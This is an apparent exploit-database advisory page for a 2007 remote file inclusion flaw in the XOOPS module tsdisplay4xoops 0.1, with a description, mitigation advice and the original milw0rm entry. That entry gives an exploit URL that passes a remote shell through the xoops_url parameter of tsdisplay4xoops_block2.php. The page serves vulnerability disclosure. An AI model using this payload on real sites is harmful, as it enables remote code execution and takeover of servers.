header-logo
Suggest Exploit
vendor:
tsdisplay4xoops
by:
GolD_M = [Mahmood_ali]
N/A
CVSS
HIGH
Remote File Include
CWE
Product Name: tsdisplay4xoops
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

tsdisplay4xoops 0.1(xoops_url) Remote File Include Vulnerabilitiy

The tsdisplay4xoops version 0.1 has a remote file inclusion vulnerability in the tsdisplay4xoops_block2.php file. An attacker can exploit this vulnerability by injecting malicious code through the xoops_url parameter, which can lead to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of tsdisplay4xoops that has fixed the remote file inclusion vulnerability. Additionally, input validation and sanitization should be implemented to prevent malicious code injection.
Source

Exploit-DB raw data:

# tsdisplay4xoops 0.1(xoops_url)Remote File Include Vulnerabilitiy
# D.Script: http://kisskool30.free.fr/tsdisplay4xoopsv0.08.zip 
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-16]